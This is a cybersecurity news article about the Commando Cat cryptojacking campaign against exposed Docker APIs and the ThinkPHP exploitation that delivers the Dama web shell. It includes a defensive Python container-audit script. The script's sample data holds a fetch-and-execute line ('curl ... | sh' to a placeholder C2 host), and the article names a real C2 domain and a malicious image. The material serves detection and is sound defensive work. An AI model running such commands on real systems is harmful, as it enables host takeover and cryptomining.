Commando Cat Cryptojacking Attacks Aiming Misconfigured Docker Instances as Prime Targets
An ongoing cryptojacking campaign has been attributed to the threat actor known as Commando Cat. The campaign abuses Docker instances with inadequate security to run cryptocurrency miners for financial gain.
“The intruders utilized the cmd.cat/chattr docker image container that obtains the payload from their own command-and-control (C&C) infrastructure,” Trend Micro researchers Sunil Bharti and Shubham Singh said in an analysis published on Thursday.
At the beginning of this year, Cado Security was the first to document Commando Cat, which takes its name from its use of the open-source Commando project to generate a harmless container.
The attacks target misconfigured Docker remote API servers in order to deploy a Docker image named cmd.cat/chattr, which is then used as the basis for instantiating a container and breaking out of its confines with the chroot command. This gives the attackers access to the host operating system.
The final stage retrieves the malicious miner binary from a command-and-control server (“leetdbs.anondns[.]net/z”) via a shell script, using either curl or wget. The binary is believed to be ZiggyStarTux, an open-source Internet Relay Chat (IRC) bot based on the Kaiten malware, also known as Tsunami.
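A defender-side check for the two conditions this campaign depends on (a Docker API reachable over plain TCP, and a container that bind-mounts the host root filesystem and chroots into it), as an added Python example that is not part of the article or of Trend Micro's research. The sample container records are constructed in the shape of `docker inspect` output; the field names (`Config.Image`, `HostConfig.Binds`, `HostConfig.Privileged`, `Path`, `Args`) and the `daemon.json` keys `hosts` and `tlsverify` are real Docker fields, while the container names, IDs and the download URL are made up.

```python
import json
from typing import Dict, List

# Constructed sample in the shape of `docker inspect` output; only the fields
# the checks below read are included. Record c2 mirrors the pattern the article
# describes: the cmd.cat/chattr image, the host root bind-mounted, chroot into it.
SAMPLE_CONTAINERS = json.loads(r'''[
  {"Id": "c1", "Name": "/web", "Path": "nginx",
   "Args": ["-g", "daemon off;"],
   "Config": {"Image": "nginx:1.25"},
   "HostConfig": {"Privileged": false,
                  "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
  {"Id": "c2", "Name": "/hopeful_morse", "Path": "chroot",
   "Args": ["/host", "sh", "-c", "curl -s http://C2-PLACEHOLDER/z | sh"],
   "Config": {"Image": "cmd.cat/chattr"},
   "HostConfig": {"Privileged": false, "Binds": ["/:/host"]}},
  {"Id": "c3", "Name": "/debug", "Path": "bash", "Args": [],
   "Config": {"Image": "ubuntu:22.04"},
   "HostConfig": {"Privileged": true, "Binds": []}}
]''')

# Image name reported in the article; extend from your own threat intel.
KNOWN_BAD_IMAGES = {"cmd.cat/chattr"}


def host_root_binds(binds: List[str]) -> List[str]:
    """Return bind mounts whose host-side source is the root filesystem ('/')."""
    return [b for b in binds if b.split(":")[0] == "/"]


def audit_container(c: dict) -> List[str]:
    """Return human-readable reasons this container record looks like a
    container-to-host breakout; an empty list means nothing was flagged."""
    reasons = []
    image = c.get("Config", {}).get("Image", "")
    host_cfg = c.get("HostConfig", {})
    binds = host_cfg.get("Binds") or []
    argv = [c.get("Path", "")] + list(c.get("Args") or [])

    if image in KNOWN_BAD_IMAGES:
        reasons.append(f"image {image} is a known cryptojacking indicator")
    roots = host_root_binds(binds)
    if roots:
        reasons.append("host root filesystem bind-mounted: " + ", ".join(roots))
    if host_cfg.get("Privileged"):
        reasons.append("container runs privileged")
    if "chroot" in argv:
        reasons.append("entrypoint invokes chroot: " + " ".join(argv))
    return reasons


def audit_containers(containers: List[dict]) -> Dict[str, List[str]]:
    """Map container name -> reasons, for flagged containers only."""
    return {c["Name"]: r for c in containers if (r := audit_container(c))}


def exposed_daemon_listeners(daemon_json: dict) -> List[str]:
    """Return tcp:// listeners from a daemon.json 'hosts' list that are not
    protected by client-certificate verification ('tlsverify': true).
    An unauthenticated tcp:// listener is the 'misconfigured remote API'
    the campaign scans for."""
    if daemon_json.get("tlsverify"):
        return []
    return [h for h in daemon_json.get("hosts", []) if h.startswith("tcp://")]


if __name__ == "__main__":
    for name, reasons in audit_containers(SAMPLE_CONTAINERS).items():
        print(name)
        for r in reasons:
            print("  -", r)
    # Constructed daemon.json fragment with the weak setting.
    weak = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
    print("exposed listeners:", exposed_daemon_listeners(weak))
```

On a real host, feed `audit_containers` the parsed output of `docker inspect $(docker ps -aq)` and `exposed_daemon_listeners` the parsed `/etc/docker/daemon.json`; the `Privileged` and host-root-bind checks are worth alerting on regardless of image name, since the image used is trivially renamed while the host mount is what the breakout needs.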
“The importance of this attack campaign lies in the utilization of Docker images to deploy cryptojacking scripts on compromised systems,” according to the investigation team. “This technique enables intruders to exploit flaws in Docker configurations while avoiding discovery by security software.”
The disclosure coincides with Akamai's report that years-old security flaws in ThinkPHP applications (such as CVE-2018-20062 and CVE-2019-9082) are being exploited by a threat actor believed to be Chinese-speaking to deliver a web shell named Dama, as part of a campaign that has been running since October 17, 2023.
“The attack strives to obtain additional obfuscated code from another compromised ThinkPHP server in order to gain an initial foothold,” Akamai researchers Ron Mankivsky and Maxim Zavodchik explained. “After successfully attacking the system, the hackers will install a Chinese language web shell named Dama to maintain persistent access to the server.”
The web shell is equipped with a number of advanced capabilities: collecting system data, uploading files, scanning network ports, escalating privileges, and navigating the file system. The last of these lets the threat actors edit and delete files and modify timestamps to cover their tracks.
“The latest assaults initiated by a Chinese-speaking attacker demonstrate a continuing pattern of adversaries utilizing a fully-fledged web shell, intended for advanced victim control,” according to the study authors. “Interestingly, not all targeted customers were using ThinkPHP, which suggests that the attackers may be indiscriminately targeting a broad range of systems.”
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blog, he’s also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM. Naager entered the field of content in an unusual way. He began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts. He also combines this interest with a love of narrative, which makes him a good writer in the cybersecurity field. In the bottom line, he frequently writes for Craw Security.